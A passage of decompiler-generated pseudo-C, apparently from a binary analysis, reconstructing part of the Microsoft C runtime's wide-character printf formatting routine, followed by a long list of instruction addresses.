                            																											if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x58) {
                            																												 *(__ebp - 0x45c) = 0;
                            																												goto L18;
                            																											}
                            																											goto L59;
                            																										}
                            																										L51:
                            																										__eax =  *(__ebp + 0xc);
                            																										__ecx =  *( *(__ebp + 0xc) + 2) & 0x0000ffff;
                            																										if(__ecx != 0x32) {
                            																											goto L53;
                            																										} else {
                            																											 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                            																											 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                            																											 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xffff7fff;
                            																											 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xffff7fff;
                            																											goto L61;
                            																										}
                            																									}
                            																									L48:
                            																									__eax =  *(__ebp + 0xc);
                            																									__ecx =  *( *(__ebp + 0xc) + 2) & 0x0000ffff;
                            																									if(__ecx != 0x34) {
                            																										goto L50;
                            																									} else {
                            																										 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                            																										 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                            																										 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00008000;
                            																										 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00008000;
                            																										goto L61;
                            																									}
                            																								case 1:
                            																									L62:
                            																									__ecx =  *(__ebp - 0x10);
                            																									__ecx =  *(__ebp - 0x10) | 0x00000020;
                            																									 *(__ebp - 0x10) = __ecx;
                            																									goto L64;
                            																								case 2:
                            																									L43:
                            																									__edx =  *(__ebp + 0xc);
                            																									__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
                            																									if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x6c) {
                            																										 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000010;
                            																										 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000010;
                            																									} else {
                            																										__ecx =  *(__ebp + 0xc);
                            																										__ecx =  *(__ebp + 0xc) + 2;
                            																										 *(__ebp + 0xc) = __ecx;
                            																										 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
                            																										 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
                            																									}
                            																									goto L64;
                            																								case 3:
                            																									L63:
                            																									 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000800;
                            																									 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000800;
                            																									goto L64;
                            																								case 4:
                            																									goto L64;
                            																							}
                            																						case 7:
                            																							goto L65;
                            																						case 8:
                            																							L24:
                            																							__ecx =  *(__ebp - 0x10);
                            																							__ecx =  *(__ebp - 0x10) | 0x00000002;
                            																							 *(__ebp - 0x10) = __ecx;
                            																							goto L27;
                            																						case 9:
                            																							L25:
                            																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000080;
                            																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000080;
                            																							goto L27;
                            																						case 0xa:
                            																							L23:
                            																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000001;
                            																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000001;
                            																							goto L27;
                            																						case 0xb:
                            																							L22:
                            																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
                            																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
                            																							goto L27;
                            																						case 0xc:
                            																							L26:
                            																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000008;
                            																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000008;
                            																							goto L27;
                            																						case 0xd:
                            																							L27:
                            																							goto L214;
                            																					}
                            																				} else {
                            																					_t640 = 0;
                            																					if(0 == 0) {
                            																						 *(_t672 - 0x4dc) = 0;
                            																					} else {
                            																						 *(_t672 - 0x4dc) = 1;
                            																					}
                            																					 *(_t672 - 0x46c) =  *(_t672 - 0x4dc);
                            																					if( *(_t672 - 0x46c) == 0) {
                            																						_push(L"(\"Incorrect format specifier\", 0)");
                            																						_push(0);
                            																						_push(0x460);
                            																						_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
                            																						_push(2);
                            																						_t517 = L0040E1A0();
                            																						_t675 = _t675 + 0x14;
                            																						if(_t517 == 1) {
                            																							asm("int3");
                            																						}
                            																					}
                            																					L14:
                            																					if( *(_t672 - 0x46c) != 0) {
                            																						goto L16;
                            																					} else {
                            																						 *((intOrPtr*)(L0040EC70(_t586))) = 0x16;
                            																						E00411A50(_t565, _t586, _t670, _t671, L"(\"Incorrect format specifier\", 0)", L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x460, 0);
                            																						 *(_t672 - 0x4c8) = 0xffffffff;
                            																						E0040D380(_t672 - 0x40);
                            																						_t502 =  *(_t672 - 0x4c8);
                            																						L225:
                            																						return E00416CA0(_t502, _t565,  *(_t672 - 0x48) ^ _t672, _t640, _t670, _t671);
                            																					}
                            																				}
                            																			}
                            																			L215:
                            																			if( *(_t672 - 0x45c) == 0 ||  *(_t672 - 0x45c) == 7) {
                            																				 *(_t672 - 0x4f8) = 1;
                            																			} else {
                            																				 *(_t672 - 0x4f8) = 0;
                            																			}
                            																			_t640 =  *(_t672 - 0x4f8);
                            																			 *(_t672 - 0x4bc) =  *(_t672 - 0x4f8);
                            																			if( *(_t672 - 0x4bc) == 0) {
                            																				_push(L"((state == ST_NORMAL) || (state == ST_TYPE))");
                            																				_push(0);
                            																				_push(0x8f5);
                            																				_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
                            																				_push(2);
                            																				_t507 = L0040E1A0();
                            																				_t675 = _t675 + 0x14;
                            																				if(_t507 == 1) {
                            																					asm("int3");
                            																				}
                            																			}
                            																			if( *(_t672 - 0x4bc) != 0) {
                            																				 *(_t672 - 0x4d4) =  *(_t672 - 0x44c);
                            																				E0040D380(_t672 - 0x40);
                            																				_t502 =  *(_t672 - 0x4d4);
                            																			} else {
                            																				 *((intOrPtr*)(L0040EC70(_t578))) = 0x16;
                            																				E00411A50(_t565, _t578, _t670, _t671, L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x8f5, 0);
                            																				 *(_t672 - 0x4d0) = 0xffffffff;
                            																				E0040D380(_t672 - 0x40);
                            																				_t502 =  *(_t672 - 0x4d0);
                            																			}
                            																			goto L225;
                            																		}
                            																		L188:
                            																		if(( *(_t672 - 0x10) & 0x00000040) != 0) {
                            																			if(( *(_t672 - 0x10) & 0x00000100) == 0) {
                            																				if(( *(_t672 - 0x10) & 0x00000001) == 0) {
                            																					if(( *(_t672 - 0x10) & 0x00000002) != 0) {
                            																						 *((short*)(_t672 - 0x14)) = 0x20;
                            																						 *(_t672 - 0x1c) = 1;
                            																					}
                            																				} else {
                            																					 *((short*)(_t672 - 0x14)) = 0x2b;
                            																					 *(_t672 - 0x1c) = 1;
                            																				}
                            																			} else {
                            																				 *((short*)(_t672 - 0x14)) = 0x2d;
                            																				 *(_t672 - 0x1c) = 1;
                            																			}
                            																		}
                            																		 *((intOrPtr*)(_t672 - 0x4ac)) =  *((intOrPtr*)(_t672 - 0x18)) -  *((intOrPtr*)(_t672 - 0x24)) -  *(_t672 - 0x1c);
                            																		if(( *(_t672 - 0x10) & 0x0000000c) == 0) {
                            																			E00423FF0(0x20,  *((intOrPtr*)(_t672 - 0x4ac)),  *((intOrPtr*)(_t672 + 8)), _t672 - 0x44c);
                            																			_t675 = _t675 + 0x10;
                            																		}
                            																		E00424030( *(_t672 - 0x1c), _t672 - 0x14,  *(_t672 - 0x1c),  *((intOrPtr*)(_t672 + 8)), _t672 - 0x44c);
                            																		_t675 = _t675 + 0x10;
                            																		if(( *(_t672 - 0x10) & 0x00000008) != 0 && ( *(_t672 - 0x10) & 0x00000004) == 0) {
                            																			E00423FF0(0x30,  *((intOrPtr*)(_t672 - 0x4ac)),  *((intOrPtr*)(_t672 + 8)), _t672 - 0x44c);
                            																			_t675 = _t675 + 0x10;
                            																		}
                            																		if( *(_t672 - 0xc) != 0 ||  *((intOrPtr*)(_t672 - 0x24)) <= 0) {
                            																			L208:
                            																			E00424030( *((intOrPtr*)(_t672 - 0x24)),  *((intOrPtr*)(_t672 - 4)),  *((intOrPtr*)(_t672 - 0x24)),  *((intOrPtr*)(_t672 + 8)), _t672 - 0x44c);
                            																			_t675 = _t675 + 0x10;
                            																			goto L209;
                            																		} else {
                            																			L202:
                            																			 *((intOrPtr*)(_t672 - 0x4b0)) =  *((intOrPtr*)(_t672 - 4));
                            																			 *((intOrPtr*)(_t672 - 0x4b4)) =  *((intOrPtr*)(_t672 - 0x24));
                            																			while(1) {
                            																				L203:
                            																				 *((intOrPtr*)(_t672 - 0x4b4)) =  *((intOrPtr*)(_t672 - 0x4b4)) - 1;
                            																				if( *((intOrPtr*)(_t672 - 0x4b4)) <= 0) {
                            																					break;
                            																				}
                            																				L204:
                            																				_t535 = E0040D3B0(_t672 - 0x40);
                            																				_t539 = E00419150(_t672 - 0x458,  *((intOrPtr*)(_t672 - 0x4b0)),  *((intOrPtr*)( *((intOrPtr*)(E0040D3B0(_t672 - 0x40))) + 0xac)), _t535);
                            																				_t675 = _t675 + 0x10;
                            																				 *((intOrPtr*)(_t672 - 0x4b8)) = _t539;
                            																				if( *((intOrPtr*)(_t672 - 0x4b8)) > 0) {
                            																					L206:
                            																					E00423F90( *(_t672 - 0x458) & 0x0000ffff,  *((intOrPtr*)(_t672 + 8)), _t672 - 0x44c);
                            																					_t675 = _t675 + 0xc;
                            																					 *((intOrPtr*)(_t672 - 0x4b0)) =  *((intOrPtr*)(_t672 - 0x4b0)) +  *((intOrPtr*)(_t672 - 0x4b8));
                            																					continue;
                            																				}
                            																				L205:
                            																				 *(_t672 - 0x44c) = 0xffffffff;
                            																				break;
                            																			}
                            																			L207:
                            																			L209:
                            																			if( *(_t672 - 0x44c) >= 0 && ( *(_t672 - 0x10) & 0x00000004) != 0) {
                            																				E00423FF0(0x20,  *((intOrPtr*)(_t672 - 0x4ac)),  *((intOrPtr*)(_t672 + 8)), _t672 - 0x44c);
                            																				_t675 = _t675 + 0x10;
                            																			}
                            																			goto L212;
                            																		}
                            																		L65:
                            																		__eax =  *(__ebp - 0x454) & 0x0000ffff;
                            																		 *(__ebp - 0x4ec) =  *(__ebp - 0x454) & 0x0000ffff;
                            																		__ecx =  *(__ebp - 0x4ec);
                            																		__ecx =  *(__ebp - 0x4ec) - 0x41;
                            																		 *(__ebp - 0x4ec) = __ecx;
                            																	} while ( *(__ebp - 0x4ec) > 0x37);
                            																	__edx =  *(__ebp - 0x4ec);
                            																	_t141 = __edx + 0x423f50; // 0xcccccc0d
                            																	__eax =  *_t141 & 0x000000ff;
                            																	switch( *((intOrPtr*)(( *_t141 & 0x000000ff) * 4 +  &M00423F14))) {
                            																		case 0:
                            																			L120:
                            																			 *(__ebp - 0x2c) = 1;
                            																			 *(__ebp - 0x454) & 0x0000ffff = ( *(__ebp - 0x454) & 0x0000ffff) + 0x20;
                            																			 *(__ebp - 0x454) = __ax;
                            																			goto L121;
                            																		case 1:
                            																			L67:
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
                            																			if(( *(__ebp - 0x10) & 0x00000830) == 0) {
                            																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000020;
                            																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000020;
                            																			}
                            																			goto L69;
                            																		case 2:
                            																			L82:
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
                            																			if(( *(__ebp - 0x10) & 0x00000830) == 0) {
                            																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000020;
                            																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000020;
                            																			}
                            																			goto L84;
                            																		case 3:
                            																			L143:
                            																			 *((intOrPtr*)(__ebp - 0x460)) = 7;
                            																			goto L145;
                            																		case 4:
                            																			L75:
                            																			__eax = __ebp + 0x14;
                            																			 *(__ebp - 0x474) = E0041C290(__ebp + 0x14);
                            																			if( *(__ebp - 0x474) == 0) {
                            																				L77:
                            																				__edx =  *0x60b4f0; // 0x407424
                            																				 *(__ebp - 4) = __edx;
                            																				__eax =  *(__ebp - 4);
                            																				 *(__ebp - 0x24) = E0040DC40( *(__ebp - 4));
                            																				L81:
                            																				goto L187;
                            																			}
                            																			L76:
                            																			__ecx =  *(__ebp - 0x474);
                            																			if( *((intOrPtr*)( *(__ebp - 0x474) + 4)) != 0) {
                            																				L78:
                            																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000800;
                            																				if(( *(__ebp - 0x10) & 0x00000800) == 0) {
                            																					 *(__ebp - 0xc) = 0;
                            																					__edx =  *(__ebp - 0x474);
                            																					__eax =  *(__edx + 4);
                            																					 *(__ebp - 4) =  *(__edx + 4);
                            																					__ecx =  *(__ebp - 0x474);
                            																					__edx =  *__ecx;
                            																					 *(__ebp - 0x24) =  *__ecx;
                            																				} else {
                            																					__edx =  *(__ebp - 0x474);
                            																					__eax =  *(__edx + 4);
                            																					 *(__ebp - 4) =  *(__edx + 4);
                            																					__ecx =  *(__ebp - 0x474);
                            																					__eax =  *__ecx;
                            																					asm("cdq");
                            																					 *__ecx - __edx =  *__ecx - __edx >> 1;
                            																					 *(__ebp - 0x24) =  *__ecx - __edx >> 1;
                            																					 *(__ebp - 0xc) = 1;
                            																				}
                            																				goto L81;
                            																			}
                            																			goto L77;
                            																		case 5:
                            																			L121:
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
                            																			__edx = __ebp - 0x448;
                            																			 *(__ebp - 4) = __ebp - 0x448;
                            																			 *(__ebp - 0x44) = 0x200;
                            																			if( *(__ebp - 0x30) >= 0) {
                            																				L123:
                            																				if( *(__ebp - 0x30) != 0) {
                            																					L126:
                            																					if( *(__ebp - 0x30) > 0x200) {
                            																						 *(__ebp - 0x30) = 0x200;
                            																					}
                            																					L128:
                            																					if( *(__ebp - 0x30) > 0xa3) {
                            																						__ecx =  *(__ebp - 0x30);
                            																						__ecx =  *(__ebp - 0x30) + 0x15d;
                            																						 *(__ebp - 0x20) = L0040B5C0( *(__ebp - 0x30) + 0x15d,  *(__ebp - 0x30) + 0x15d, 2, "f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x6da);
                            																						if( *(__ebp - 0x20) == 0) {
                            																							 *(__ebp - 0x30) = 0xa3;
                            																						} else {
                            																							__edx =  *(__ebp - 0x20);
                            																							 *(__ebp - 4) =  *(__ebp - 0x20);
                            																							 *(__ebp - 0x30) =  *(__ebp - 0x30) + 0x15d;
                            																							 *(__ebp - 0x44) =  *(__ebp - 0x30) + 0x15d;
                            																						}
                            																					}
                            																					 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
                            																					 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
                            																					__edx =  *(__ebp + 0x14);
                            																					__eax =  *(__edx - 8);
                            																					__ecx =  *(__edx - 4);
                            																					 *(__ebp - 0x490) =  *(__edx - 8);
                            																					 *(__ebp - 0x48c) =  *(__edx - 4);
                            																					__ecx = __ebp - 0x40;
                            																					_push(E0040D3B0(__ebp - 0x40));
                            																					__edx =  *(__ebp - 0x2c);
                            																					_push( *(__ebp - 0x2c));
                            																					__eax =  *(__ebp - 0x30);
                            																					_push( *(__ebp - 0x30));
                            																					__ecx =  *(__ebp - 0x454);
                            																					_push( *(__ebp - 0x454));
                            																					__edx =  *(__ebp - 0x44);
                            																					_push( *(__ebp - 0x44));
                            																					__eax =  *(__ebp - 4);
                            																					_push( *(__ebp - 4));
                            																					__ecx = __ebp - 0x490;
                            																					_push(__ebp - 0x490);
                            																					__edx =  *0x60b3cc; // 0x7e8c4bdb
                            																					E00410200(__edx) =  *__eax();
                            																					__esp = __esp + 0x1c;
                            																					 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
                            																					if(( *(__ebp - 0x10) & 0x00000080) != 0 &&  *(__ebp - 0x30) == 0) {
                            																						__ecx = __ebp - 0x40;
                            																						_push(E0040D3B0(__ebp - 0x40));
                            																						__ecx =  *(__ebp - 4);
                            																						_push( *(__ebp - 4));
                            																						__edx =  *0x60b3d8; // 0x7e8c4bdb
                            																						E00410200(__edx) =  *__eax();
                            																						__esp = __esp + 8;
                            																					}
                            																					__eax =  *(__ebp - 0x454) & 0x0000ffff;
                            																					if(( *(__ebp - 0x454) & 0x0000ffff) == 0x67) {
                            																						 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
                            																						if(( *(__ebp - 0x10) & 0x00000080) == 0) {
                            																							__ecx = __ebp - 0x40;
                            																							_push(E0040D3B0(__ebp - 0x40));
                            																							__edx =  *(__ebp - 4);
                            																							_push( *(__ebp - 4));
                            																							__eax =  *0x60b3d4; // 0x7e8c4bdb
                            																							__eax =  *__eax();
                            																							__esp = __esp + 8;
                            																						}
                            																					}
                            																					__ecx =  *(__ebp - 4);
                            																					__edx =  *( *(__ebp - 4));
                            																					if( *( *(__ebp - 4)) == 0x2d) {
                            																						 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
                            																						 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
                            																						 *(__ebp - 4) =  *(__ebp - 4) + 1;
                            																						 *(__ebp - 4) =  *(__ebp - 4) + 1;
                            																					}
                            																					__edx =  *(__ebp - 4);
                            																					 *(__ebp - 0x24) = E0040DC40( *(__ebp - 4));
                            																					goto L187;
                            																				}
                            																				L124:
                            																				__eax =  *(__ebp - 0x454) & 0x0000ffff;
                            																				if(( *(__ebp - 0x454) & 0x0000ffff) != 0x67) {
                            																					goto L126;
                            																				}
                            																				L125:
                            																				 *(__ebp - 0x30) = 1;
                            																				goto L128;
                            																			}
                            																			L122:
                            																			 *(__ebp - 0x30) = 6;
                            																			goto L128;
                            																		case 6:
                            																			L69:
                            																			 *(__ebp - 0xc) = 1;
                            																			__ebp + 0x14 = E0041C290(__ebp + 0x14);
                            																			 *(__ebp - 0x458) = __ax;
                            																			__ecx =  *(__ebp - 0x10);
                            																			__ecx =  *(__ebp - 0x10) & 0x00000020;
                            																			if(__ecx == 0) {
                            																				 *(__ebp - 0x448) =  *(__ebp - 0x458);
                            																			} else {
                            																				 *(__ebp - 0x458) & 0x0000ffff =  *(__ebp - 0x458) & 0xff;
                            																				 *(__ebp - 0x470) = __dl;
                            																				 *((char*)(__ebp - 0x46f)) = 0;
                            																				__ecx = __ebp - 0x40;
                            																				__eax = E0040D3B0(__ebp - 0x40);
                            																				__ecx = __ebp - 0x40;
                            																				E0040D3B0(__ebp - 0x40) =  *__eax;
                            																				__ecx =  *(__ebp - 0x448 + 0xac);
                            																				__edx = __ebp - 0x470;
                            																				__eax = __ebp - 0x448;
                            																				if(E00419150(__ebp - 0x448, __ebp - 0x470,  *(__ebp - 0x448 + 0xac), __ebp - 0x448) < 0) {
                            																					 *(__ebp - 0x28) = 1;
                            																				}
                            																			}
                            																			__edx = __ebp - 0x448;
                            																			 *(__ebp - 4) = __ebp - 0x448;
                            																			 *(__ebp - 0x24) = 1;
                            																			goto L187;
                            																		case 7:
                            																			L141:
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
                            																			 *(__ebp - 8) = 0xa;
                            																			goto L150;
                            																		case 8:
                            																			L106:
                            																			__eax = __ebp + 0x14;
                            																			 *(__ebp - 0x484) = E0041C290(__ebp + 0x14);
                            																			if(E00420F80() != 0) {
                            																				L116:
                            																				__ecx =  *(__ebp - 0x10);
                            																				__ecx =  *(__ebp - 0x10) & 0x00000020;
                            																				if(__ecx == 0) {
                            																					__ecx =  *(__ebp - 0x484);
                            																					__edx =  *(__ebp - 0x44c);
                            																					 *__ecx =  *(__ebp - 0x44c);
                            																				} else {
                            																					__edx =  *(__ebp - 0x484);
                            																					__ax =  *(__ebp - 0x44c);
                            																					 *( *(__ebp - 0x484)) = __ax;
                            																				}
                            																				 *(__ebp - 0x28) = 1;
                            																				goto L187;
                            																			}
                            																			L107:
                            																			__ecx = 0;
                            																			if(0 == 0) {
                            																				 *(__ebp - 0x4f4) = 0;
                            																			} else {
                            																				 *(__ebp - 0x4f4) = 1;
                            																			}
                            																			__edx =  *(__ebp - 0x4f4);
                            																			 *(__ebp - 0x488) =  *(__ebp - 0x4f4);
                            																			if( *(__ebp - 0x488) == 0) {
                            																				_push(L"(\"\'n\' format specifier disabled\", 0)");
                            																				_push(0);
                            																				_push(0x695);
                            																				_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
                            																				_push(2);
                            																				__eax = L0040E1A0();
                            																				__esp = __esp + 0x14;
                            																				if(__eax == 1) {
                            																					asm("int3");
                            																				}
                            																			}
                            																			if( *(__ebp - 0x488) != 0) {
                            																				L115:
                            																				goto L187;
                            																			} else {
                            																				L114:
                            																				 *((intOrPtr*)(L0040EC70(__ecx))) = 0x16;
                            																				__eax = E00411A50(__ebx, __ecx, __edi, __esi, L"(\"\'n\' format specifier disabled\", 0)", L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x695, 0);
                            																				 *(__ebp - 0x4cc) = 0xffffffff;
                            																				__ecx = __ebp - 0x40;
                            																				__eax = E0040D380(__ecx);
                            																				__eax =  *(__ebp - 0x4cc);
                            																				goto L225;
                            																			}
                            																		case 9:
                            																			L148:
                            																			 *(__ebp - 8) = 8;
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
                            																			if(( *(__ebp - 0x10) & 0x00000080) != 0) {
                            																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000200;
                            																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000200;
                            																			}
                            																			goto L150;
                            																		case 0xa:
                            																			L142:
                            																			 *(__ebp - 0x30) = 8;
                            																			goto L143;
                            																		case 0xb:
                            																			L84:
                            																			if( *(__ebp - 0x30) != 0xffffffff) {
                            																				__edx =  *(__ebp - 0x30);
                            																				 *(__ebp - 0x4f0) =  *(__ebp - 0x30);
                            																			} else {
                            																				 *(__ebp - 0x4f0) = 0x7fffffff;
                            																			}
                            																			__eax =  *(__ebp - 0x4f0);
                            																			 *(__ebp - 0x47c) =  *(__ebp - 0x4f0);
                            																			__ecx = __ebp + 0x14;
                            																			 *(__ebp - 4) = E0041C290(__ebp + 0x14);
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
                            																			if(( *(__ebp - 0x10) & 0x00000020) == 0) {
                            																				L98:
                            																				if( *(__ebp - 4) == 0) {
                            																					__ecx =  *0x60b4f4; // 0x407414
                            																					 *(__ebp - 4) = __ecx;
                            																				}
                            																				 *(__ebp - 0xc) = 1;
                            																				__edx =  *(__ebp - 4);
                            																				 *(__ebp - 0x480) =  *(__ebp - 4);
                            																				while(1) {
                            																					L101:
                            																					__eax =  *(__ebp - 0x47c);
                            																					__ecx =  *(__ebp - 0x47c);
                            																					__ecx =  *(__ebp - 0x47c) - 1;
                            																					 *(__ebp - 0x47c) = __ecx;
                            																					if( *(__ebp - 0x47c) == 0) {
                            																						break;
                            																					}
                            																					L102:
                            																					__edx =  *(__ebp - 0x480);
                            																					__eax =  *( *(__ebp - 0x480)) & 0x0000ffff;
                            																					if(( *( *(__ebp - 0x480)) & 0x0000ffff) == 0) {
                            																						break;
                            																					}
                            																					L103:
                            																					 *(__ebp - 0x480) =  *(__ebp - 0x480) + 2;
                            																					 *(__ebp - 0x480) =  *(__ebp - 0x480) + 2;
                            																				}
                            																				L104:
                            																				 *(__ebp - 0x480) =  *(__ebp - 0x480) -  *(__ebp - 4);
                            																				__edx =  *(__ebp - 0x480) -  *(__ebp - 4) >> 1;
                            																				 *(__ebp - 0x24) =  *(__ebp - 0x480) -  *(__ebp - 4) >> 1;
                            																				goto L105;
                            																			} else {
                            																				L88:
                            																				if( *(__ebp - 4) == 0) {
                            																					__eax =  *0x60b4f0; // 0x407424
                            																					 *(__ebp - 4) = __eax;
                            																				}
                            																				__ecx =  *(__ebp - 4);
                            																				 *(__ebp - 0x478) = __ecx;
                            																				 *(__ebp - 0x24) = 0;
                            																				while(1) {
                            																					L92:
                            																					__eax =  *(__ebp - 0x24);
                            																					if( *(__ebp - 0x24) >=  *(__ebp - 0x47c)) {
                            																						break;
                            																					}
                            																					L93:
                            																					__ecx =  *(__ebp - 0x478);
                            																					__edx =  *__ecx;
                            																					if( *__ecx == 0) {
                            																						break;
                            																					}
                            																					L94:
                            																					__ecx = __ebp - 0x40;
                            																					E0040D3B0(__ebp - 0x40) =  *(__ebp - 0x478);
                            																					__ecx =  *( *(__ebp - 0x478)) & 0x000000ff;
                            																					if(E00419390( *( *(__ebp - 0x478)) & 0x000000ff,  *(__ebp - 0x478)) != 0) {
                            																						 *(__ebp - 0x478) =  *(__ebp - 0x478) + 1;
                            																						 *(__ebp - 0x478) =  *(__ebp - 0x478) + 1;
                            																					}
                            																					 *(__ebp - 0x478) =  *(__ebp - 0x478) + 1;
                            																					 *(__ebp - 0x478) =  *(__ebp - 0x478) + 1;
                            																					 *(__ebp - 0x24) =  *(__ebp - 0x24) + 1;
                            																					 *(__ebp - 0x24) =  *(__ebp - 0x24) + 1;
                            																				}
                            																				L97:
                            																				L105:
                            																				goto L187;
                            																			}
                            																		case 0xc:
                            																			goto L0;
                            																		case 0xd:
                            																			L144:
                            																			 *((intOrPtr*)(__ebp - 0x460)) = 0x27;
                            																			L145:
                            																			 *(__ebp - 8) = 0x10;
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
                            																			if(( *(__ebp - 0x10) & 0x00000080) != 0) {
                            																				__edx = 0x30;
                            																				 *((short*)(__ebp - 0x14)) = __dx;
                            																				 *((intOrPtr*)(__ebp - 0x460)) =  *((intOrPtr*)(__ebp - 0x460)) + 0x51;
                            																				 *(__ebp - 0x12) = __ax;
                            																				 *(__ebp - 0x1c) = 2;
                            																			}
                            																			goto L150;
                            																		case 0xe:
                            																			goto L187;
                            																	}
                            																}
                            															}
                            														}
                            													}
                            												}
                            											}
                            										}
                            									}
                            								}
                            							}
                            						}
                            					}
                            				}
                            			}




























                            0x004238ad
                            0x004238ad
                            0x004238ad
                            0x004238ad
                            0x004238ad
                            0x004238ad
                            0x004238ad
                            0x004238ad
                            0x00000000
                            0x00423922
                            0x00000000
                            0x00423922
                            0x00000000
                            0x00423922
                            0x00423922
                            0x0042392a
                            0x0042394c
                            0x00423952
                            0x00423977
                            0x004239be
                            0x004239c1
                            0x004239e2
                            0x004239e7
                            0x004239ec
                            0x004239f2
                            0x004239c3
                            0x004239c7
                            0x004239cc
                            0x004239cf
                            0x004239d0
                            0x004239d6
                            0x004239d6
                            0x00423979
                            0x0042397c
                            0x0042397f
                            0x004239a1
                            0x004239a6
                            0x004239ac
                            0x004239ad
                            0x004239b3
                            0x00423981
                            0x00423985
                            0x0042398a
                            0x0042398e
                            0x0042398f
                            0x00423995
                            0x00423995
                            0x004239b9
                            0x00423954
                            0x00423958
                            0x0042395d
                            0x00423960
                            0x00423966
                            0x00423966
                            0x0042392c
                            0x00423930
                            0x00423935
                            0x00423938
                            0x0042393e
                            0x0042393e
                            0x004239fe
                            0x00423a40
                            0x00423a46
                            0x00423a52
                            0x00000000
                            0x00423a00
                            0x00423a00
                            0x00423a00
                            0x00423a07
                            0x00000000
                            0x00423a14
                            0x00423a14
                            0x00423a22
                            0x00423a27
                            0x00423a2d
                            0x00423a3b
                            0x00423a58
                            0x00423a60
                            0x00423a82
                            0x00423a82
                            0x00423a8c
                            0x00423a9d
                            0x00423aa7
                            0x00423aa9
                            0x00423aa9
                            0x00423a8e
                            0x00423a8e
                            0x00423a8e
                            0x00423abc
                            0x00423abe
                            0x00423abe
                            0x00423acb
                            0x00423ace
                            0x00423ace
                            0x00423ad4
                            0x00423ad7
                            0x00423adc
                            0x00000000
                            0x00000000
                            0x00423aec
                            0x00423aef
                            0x00423af9
                            0x00423b08
                            0x00423b11
                            0x00423b27
                            0x00423b2d
                            0x00423b3a
                            0x00423b48
                            0x00423b48
                            0x00423b57
                            0x00423b5f
                            0x00423b5f
                            0x00423b67
                            0x00423b70
                            0x00423b79
                            0x00423b85
                            0x00423b9e
                            0x00423ba4
                            0x00423bad
                            0x00423bad
                            0x00000000
                            0x00423bb0
                            0x00000000
                            0x00423bb0
                            0x00000000
                            0x00423bb0
                            0x00000000
                            0x00423bb0
                            0x00000000
                            0x00423bb0
                            0x00000000
                            0x00423bb0
                            0x00000000
                            0x00423bb0
                            0x00423bb0
                            0x00423bb0
                            0x00423bb4
                            0x00423d90
                            0x00423d94
                            0x00423d9c
                            0x00423da1
                            0x00423da4
                            0x00423da4
                            0x00423dab
                            0x00423dab
                            0x00422f2b
                            0x00422f32
                            0x00422f3f
                            0x00422f44
                            0x00000000
                            0x00422f57
                            0x00422f61
                            0x00422f88
                            0x00422f6f
                            0x00422f80
                            0x00422f80
                            0x00422f61
                            0x00422f92
                            0x00422f98
                            0x00422fa4
                            0x00422fa7
                            0x00422fb5
                            0x00422fb8
                            0x00422fc5
                            0x0042306a
                            0x00423070
                            0x0042307d
                            0x00000000
                            0x00000000
                            0x00423083
                            0x00423089
                            0x00000000
                            0x00423090
                            0x00423090
                            0x004230aa
                            0x004230af
                            0x00000000
                            0x00000000
                            0x004230b7
